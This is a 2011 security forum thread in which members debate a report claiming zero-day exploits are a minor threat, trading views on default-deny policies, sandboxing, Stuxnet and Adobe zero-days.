0-Days Not As Big of a Threat as You Think

Discussion in 'other security issues & news' started by dw426, Oct 13, 2011.

Thread Status:
Not open for further replies.
  1. dw426

    dw426 Registered Member

    Joined:
    Jan 3, 2007
    Posts:
    5,543
  2. Dark Shadow

    Dark Shadow Registered Member

    Joined:
    Oct 11, 2007
    Posts:
    4,553
    Location:
    USA
    IMO,Its just scare tactics to try to get people to spend there money and bloat there pc to dealth with security software.
     
  3. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Let's make this very clear... the article is talking about zero-day exploits and not zero-day malware.

    It's fairly well known that you're more likely to be exploited by an out of date plugin/ browser because of KNOWN vulnerabilities.

    But most malware infections are probably from 0day malicious files.


    The reason people talk about 0days so much is pretty clear, they're unknown. Defending against known exploits is often as easy as updating your software. Defending against unknown exploits means creating strong policies etc and hoping for the best.

    I read the article a few days ago and didn't think much of it. 0days should definitely be taken seriously whether malicious files or exploits.
     
  4. Dark Shadow

    Dark Shadow Registered Member

    Joined:
    Oct 11, 2007
    Posts:
    4,553
    Location:
    USA
    Have no fear sandboxie is here and a change of under wear in case my pc gets soiled.:D
     
  5. wat0114

    wat0114 Guest

    These statements seem to sum it up nicely...

     
  6. 1chaoticadult

    1chaoticadult Registered Member

    Joined:
    Oct 28, 2010
    Posts:
    2,248
    Location:
    Chaotic Land
    I don't take any 0-day serious. I take my security policy instead.
     
  7. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Policy in windows isn't strong enough for me to feel confident.

    Maybe Protogon filesystem will help with permissions idk
     
  8. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    Zero day exploits and the malware they deliver is only a threat on systems where they're allowed to execute, aka systems relying on conventional default-permit based security apps. A zero day exploit is meaningless if it can't deliver a functional malicious payload. Of course the security app vendors won't tell you this. There's no profit in default-deny based security.
     
  9. cozumel

    cozumel Registered Member

    Joined:
    May 23, 2009
    Posts:
    260
    Location:
    London, UK
    Running virtual machine within your OS and running sandboxie within the vm would still not prevent potential attack from unknown exploit as anything is vulnerable if the malware is well designed and targets specific vulnerability.

    Being prepared, aware and having robust procedures is all we can do. I like to think that that is more than 'hoping for the best' and keeping your fingers crossed lol
     
  10. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    After November (day 3), things will be safer for AppLocker users. :D
     
  11. dw426

    dw426 Registered Member

    Joined:
    Jan 3, 2007
    Posts:
    5,543
    Well, I disagree. The article reports that zero-day exploit threats are practically nil. So, even a zero-day malware piece that is designed to exploit a vulnerability that is no longer there, is also non-threatening. Besides, I have not seen, in all my years of computing that many true "zero-day" malware. The vast majority of malware that is "new", is nothing more than tweaked versions of already familiar malware. I really don't care that security companies come out with their scare reports. I only care about what is in the wild and a real threat to users.

    I'm sorry, but security companies pull in millions/billions a year playing the same game the "Haunted House" industry does, which is scare the hell out of you.
     
  12. 1chaoticadult

    1chaoticadult Registered Member

    Joined:
    Oct 28, 2010
    Posts:
    2,248
    Location:
    Chaotic Land
    That trick only works on the ill-informed.
     
  13. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    The question is: In whom to believe?

    A few weeks ago, Google released a report stating otherwise. Who's being the big liar? Google? Microsoft?

    :argh:

    A zero-day exploiting a patched vulnerability is not dangerous, of course. But, the same zero-day will remain dangerous as long as many systems and applications run unpatched, and that is, unfortunately, a reality.

    But, if exploits aren't, and never were, that much of a threat, then why does Internet Explorer have a sandbox? Why sandboxing something that isn't a threat? I suppose Microsoft will take it away with IE10?
     
  14. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    The Stuxnet worm is a good example. To install its payload, it used 1 - 4 Zero-day exploits (depending on how you define Zero-day).

    INFILTRATING CRITICAL INFRASTRUCTURES
    http://www.aisec.fraunhofer.de/content/dam/sitmuc/en/pdf/studien/studie_stuxnet.pdf
    A secure Default-Deny Policy stops Stuxnet cold.

    A Policy doesn't always mean a product. In the original targeted scenarios, no extra security product was required:

    Shortly after the emergence of the LNK exploit, I happened to meet someone who is system administrator overseeing 300+ computers. He said that they had a Group Policy whereby no executables can run/load from external media on the work computers.

    End of Exploit -- Zero-day or not, it didn't matter.

    regards,

    -rich
     
  15. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    No sane person will deny that exploits are a threat.

    I've contended in the past that a Sandbox is a fail-safe device to contain the malware payload that is permitted to execute and get by the perimeter defense.

    Nothing wrong with that at all, but not necessary if you feel secure with your Policies and Procedures that prevent the exploit from running in the first place.

    Example: Adobe's Sandbox.

    With the browser properly configured, the malicious payload will never make its way into the Sandbox because the code embedded in the web page will not be able to execute its commands to drop the payload executable.

    Regards,

    -rich
     
  16. Sully

    Sully Registered Member

    Joined:
    Dec 23, 2005
    Posts:
    3,719
    I think most everyone can agree that there are very real threats lying about. Whenever I see this sort of talk, it usually reminds me that I do need to have a set of protocols and tools in place, because threats do exist - but it also reminds me that I am very happy to be out of that "business model".

    There have been various threads here over the years about whether an average user should have to make any decisions (become educated) or not. I don't think it is too outlandish to suggest that if there is no education, then they are merely a piece of the security business model. And like all businesses, you must have demand to sell your supply. Are reports and talk of 0-day threats fact or fiction?

    Well, they are both. Some reports seem rather obvious (at least to me) due to the sensationalism they depict (the world is doomed, unless you use our product) and others seem to downplay it as an non-existent threat.

    That is why I say users who really want "freedom" need to be educated. There are pitfalls out there, but you have to understand them to avoid them. And the pitfalls are not only viruses/malware/trojans, but also really crappy software that you have to buy, or freeware that just sucks. The amount of knowledge needed of course will vary greatly, but lack of any knowledge or sticking your head in the sand both seem illogical to me.

    Sul.
     
  17. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    Sandboxing is necessary to contain code that shouldn't have been allowed to execute in the first place. IMO sandboxing should be regarded as a 2nd line of defense. It should be used to contain legitimate attack surface applications in order to protect the rest of the system from code embedded in the files, media, etc that these apps open, a malicious PDF for instance. Other non-whitelisted executables, should never get that far. Running unknown executables in a sandbox keeps the user in a continual arms race with those who write that code. Eventually, someone breaks the containment, the sandbox gets patched, and the cycle repeats. It's the usual penetrate and patch routine, the same reactive policy that results in casualties and/or damage before the patch is released.
    Very true. There's several ways to implement a default-deny policy, just as there's several ways to sandbox your attack surface, eg a sandbox app, virtual system, system policy, 3rd party HIPS rules, etc. What the user chooses is largely a matter of preference and trust. Myself, I don't trust Microsoft's built in tools to control the OS components, no matter how well it controls other software. That aside, for exploits that target the attack surface and malicious code contained in legitimate appearing files, how you sandbox them is not particularly important, as long as you do.
     
  18. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    IDK why anyone is talking about sandboxing like it can't be policy.

    Anyways,

    Yes, 0day exploits are not a huge deal.

    But let's not forget:
    http://www.adobe.com/support/security/advisories/apsa11-01.html
    or even:
    http://www.zdnet.com/blog/security/adobe-flash-zero-day-exploit-in-the-wild/1189

    0-day exploits happen... and they're taken advantage of. They're not always in the OS but they DO happen. Uncommon or not they are absolutely not something to be scoffed at, again because it's so difficult to protect yourself against them.

    As for security companies and scare reports, idk about that. Considering that most security software absolutely fails to deal with 0days I don't think they'd focus much on that!

    Now to focus on this:
    I don't see your point.

    Zero-day malware does not have to use exploits, it can be entirely socially engineered. It also can be a simple update to an older piece of malware to move around heuristics/ blacklists.

    It's still 0day and most of the malware you run into probably hasn't existed for more than a few days. That's not always the case, but there are hundreds of new malicious files (updates or not they're 0day malicious files) and they DO get spread around a ton.

    Again, Microsoft is talking about exploits... not files. 0day files are actually what I'd say they consider to be the huge threat here. Consider smartscreen, the idea is to stop new files from being downloaded without the users knowledge. It's aimed at NEW socially engineered malware.

    And as was brought up by someone above this is a report my Microsoft. We've seen just as fancy reports by Google and we've seen reports by others contradicting them. There are so many arguments both ways I personally have no clue anymore.

    On the one hand you've got Google, a company with more information on the web than nearly any other. Then we have Microsoft, a tech giant with more Windows-specific information than anyone else.

    Personally, I only care about 0day exploits. It's the only thing that's really just "out of my hands."
     
  19. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,408
    Believe what you want, I'd rather be safe then sorry.

    Couldn't agree more.


    Well said.
    Some form of sandbox/containment/default deny policy is IMO a very wise decision, and will always be a part of my setup.
     
  20. CogitoTesting

    CogitoTesting Registered Member

    Joined:
    Jul 4, 2009
    Posts:
    901
    Location:
    Sea of Tranquility, Luna
    Oh my gosh, you are quite poetic. o_O.

    Thanks.
     
  21. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    I did say it.
    I run a policy sandbox. The main difference is that it's enforced as much by HIPS as it is by the built in tools.
     
  22. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Ah, well there we go.
     
  23. Dark Shadow

    Dark Shadow Registered Member

    Joined:
    Oct 11, 2007
    Posts:
    4,553
    Location:
    USA
    Not really but thanks.
     
  24. TonyW

    TonyW Registered Member

    Joined:
    Oct 12, 2005
    Posts:
    2,635
    Location:
    UK
    And many of those are on sites which some of us don't come into contact with, unless you make a point of visiting malc0de, MDL or similar where they're listed there. And often not for long either.
     
  25. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    Most of those sites you visit via malware domain respositories are often opened up in an iframe and then linked via javascript to a hacked and legitimate domain.

    I believe that was the case with mysql.com

    http://blog.sucuri.net/2011/09/mysql-com-hacked-javascript-malware.html

    http://www.pc1news.com/news/0082/we...being-spread-through-legitimate-websites.html

    ebsense Security Labsâ„¢ Report: Majority of Malware Being Spread Through Legitimate Websites
     
Loading...
Thread Status:
Not open for further replies.